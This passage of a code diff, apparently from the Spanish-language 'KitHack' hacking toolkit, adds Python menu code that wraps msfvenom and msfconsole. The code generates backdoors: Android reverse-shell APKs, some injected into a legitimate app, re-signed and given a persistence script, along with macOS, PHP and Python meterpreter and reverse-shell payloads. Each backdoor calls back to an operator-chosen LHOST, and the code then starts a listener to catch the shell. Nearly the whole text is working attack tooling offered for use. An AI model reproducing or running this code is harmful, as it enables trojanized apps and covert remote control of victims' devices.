file.close() + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk" + .format(LHOST, LPORT)) + print("{0}[*] Decompiling APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/payload -o output/kithack.apk") + location = os.getcwd() + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + # Salida de bucle + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print("\n{0}[*] Generating persistence file...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format( + RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format( + DEFAULT, GREEN)) + print("{0}[01]{1} Use the old Metasploit method".format( + WHITE, YELLOW)) + print("{0}[02]{1} Use the new KitHack method".format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk" + .format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat( + "output/{}.apk".format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif m == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format( + YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format( + YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", + "*.*")), + ) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}" + .format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)) + print("\n{0}[*] Generating payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk" + .format(LPORT, LHOST)) + location = os.getcwd() + print("{0}[*] Decompiling original APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk" + .format(APK, location)) + print("\n{0}[*] Decompiling payload APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool d -f -o output/payload output/payload.apk" + ) + print("\n{0}[*] Configuring RAT Payload...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; rat"]) + print("\n{0}[*] Compiling RAT APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apktool b output/original -o output/kithack.apk") + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) + time.sleep(4) + os.system( + "zipalign 4 output/kithack.apk output/{0}.apk". + format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}" + .format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + ".apk" + subprocess.Popen([ + "bash", "-c", + ". lib/apkf.sh; pers output/" + ext + ]) + print("{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout)) + break + print("\n{0}[*] Deleting temporary files...{1}". + format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk" + .format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != + "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause( + "\n{}Presione cualquier tecla para continuar..." + .format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n". + format(RED)) + time.sleep(3) + os.system( + "rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk" + ) + pause( + "{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("{}\n[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "04": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} osx/x64/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} osx/x64/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} osx/x64/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} osx/x64/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[05]{1} osx/x64/shell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} osx/x86/shell_reverse_tcp".format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print( + "\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print( + "\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "03": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print( + "\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "04": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print( + "\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "05": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print( + "\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "06": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.macho".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x86/shell_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "05": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} php/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[02]{1} php/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[03]{1} php/reverse_php".format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = tool.zfill(2) + + if pay == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p php/meterpreter_reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.php".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter_reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + if pay == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.php" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.php".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/meterpreter/reverse_tcp; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "03": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p php/reverse_php LHOST={0} LPORT={1} R > output/{2}.php" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.php".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.php". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD php/reverse_php; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + else: + print("\n{}[X] OPCION INVALIDA\n".format(RED)) + time.sleep(3) + pause("{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("clear") + main() + + elif sys == "06": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} python/meterpreter_reverse_http".format( + WHITE, YELLOW)) + print("{0}[02]{1} python/meterpreter_reverse_https".format( + WHITE, YELLOW)) + print("{0}[03]{1} python/meterpreter_reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[04]{1} python/meterpreter/reverse_tcp".format( + WHITE, YELLOW)) + print("{0}[05]{1} python/shell_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[06]{1} python/shell_reverse_tcp_ssl".format( + WHITE, YELLOW)) + print("{0}[07]{1} python/shell_reverse_udp".format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == "01": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_http LHOST={0} LPORT={1} -f raw > output/{2}.py" + .format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat("output/{}.py".format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.py". + format(GREEN, DEFAULT, location, mainout)) + if (input( + "\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}" + .format(GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("systemctl stop postgresql && clear") + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD python/meterpreter_reverse_http; exploit\'"' + .format(LHOST, LPORT)) + pause("\n{}Presione cualquier tecla para continuar...". + format(GREEN)) + os.system("systemctl stop postgresql && clear") + main() + else: + print("{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + time.sleep(3) + pause( + "{}Presione cualquier tecla para continuar...".format( + GREEN)) + os.system("systemctl stop postgresql && clear") + main() + + elif pay == "02": + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Ingrese un nombre para su archivo de salida: {1}". + format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print("\n{0}[*] Generating backdoor...{1}".format( + GREEN, DEFAULT)) + time.sleep(4) + os.system( + "systemctl start postgresql && msfvenom -p python/meterpreter_reverse_https LHOST={0} LPORT={1} -f raw > 